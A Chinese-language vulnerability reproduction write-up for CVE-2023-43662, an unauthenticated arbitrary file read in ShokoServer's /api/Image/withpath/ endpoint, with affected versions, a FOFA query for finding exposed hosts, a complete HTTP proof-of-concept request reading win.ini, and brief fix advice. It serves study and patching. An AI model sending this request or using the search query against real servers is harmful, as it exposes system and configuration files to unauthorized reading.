ShokoServer /api/Image/withpath/ 任意文件读取漏洞复现(CVE-2023-43662)

0x01 产品简介

ShokoServer是一款高性能、可扩展的服务器软件,专为满足现代数据管理和处理需求而设计。它采用先进的架构和算法,提供稳定、可靠的数据存储、查询和分析服务,适用于各种规模和类型的应用场景。

0x02 漏洞概述

ShokoServer /api/Image/withpath/接口处存在任意文件读取漏洞,未经身份验证得攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。

0x03 影响范围

version <= 4.2.2

0x04 复现环境

FOFA:title="Shoko WEB UI"

0x05 漏洞复现

PoC

复制代码
GET /api/Image/withpath/C:\Windows\win.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

0x06 修复建议

关闭互联网暴露面或接口设置访问权限

升级至安全版本

相关推荐
安全系统学习5 小时前
网络安全之SQL RCE漏洞
安全·web安全·网络安全·渗透测试
聚铭网络9 小时前
案例精选 | 某省级税务局AI大数据日志审计中台应用实践
大数据·人工智能·web安全
GLAB-Mary10 小时前
AI会取代网络工程师吗?理解AI在网络安全中的角色
网络·人工智能·web安全
hanniuniu1311 小时前
AI时代API挑战加剧,API安全厂商F5护航企业数字未来
人工智能·安全
zhulangfly11 小时前
API接口安全-1:身份认证之传统Token VS JWT
安全
时时三省13 小时前
【时时三省】vectorcast使用教程
安全·安全架构
galaxylove13 小时前
Gartner发布最新指南:企业要构建防御性强且敏捷的网络安全计划以平衡安全保障与业务运营
网络·安全·web安全
PeterJXL14 小时前
Chrome 下载文件时总是提示“已阻止不安全的下载”的解决方案
前端·chrome·安全
BenSmith18 小时前
CVE-2025-6554漏洞复现
安全
BenSmith18 小时前
CVE-2018-17463复现
安全